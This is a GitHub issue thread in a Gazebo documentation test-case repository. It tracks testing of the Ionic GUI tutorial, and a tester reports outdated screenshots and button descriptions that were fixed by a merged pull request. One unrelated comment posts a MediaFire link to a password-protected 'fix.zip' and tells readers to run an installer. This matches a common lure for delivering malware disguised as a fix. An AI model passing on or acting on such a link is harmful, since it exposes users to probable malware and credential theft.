gazebosim/gazebo_test_cases #1056: docs: gui

azeey-test, 2024-08-29:
## Configuration

* os: Ubuntu Noble

## Links

* [Live](https://gazebosim.org/docs/ionic/gui)
* [Source](https://github.com/gazebosim/docs/tree/master/ionic/GUI_tutorial.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

alesof, 2024-08-30:
Interested ✋🏼

alesof, 2024-08-30:
## Configuration
Running on Ubuntu 22.04 using the suggested docker setup. Gazebo version is 9.0.0~pre1.

## Process
Step1: Instructions mostly work but there are some differences between the guide and the GUI. Opened a PR containing the modified guide. 

Modifications include text and images, for instance:

- shapes.png image doesn't match (e.g. in ionic there is a cone spawned)
- shape buttons don't match the description
- shape_insertion.png doesn't match (as for shapes.png)
- entity_selection.png doesn't match (as for shapes.png)
- grid_config.png doesn't match (as for shapes.png)

I added screenshots as png that match the previous names in the PR.

## Other Comments
The shapes.sdf scene spawns also a "default" entity selectable in the Entity Tree. This is not described in the documentation and it probably shouldn't appear.

iche033, 2024-08-30:
https://github.com/gazebosim/docs/pull/491

ahcorde, 2024-09-02:
PR is merged, Thank you for testing!

closed 2024-09-02 by ahcorde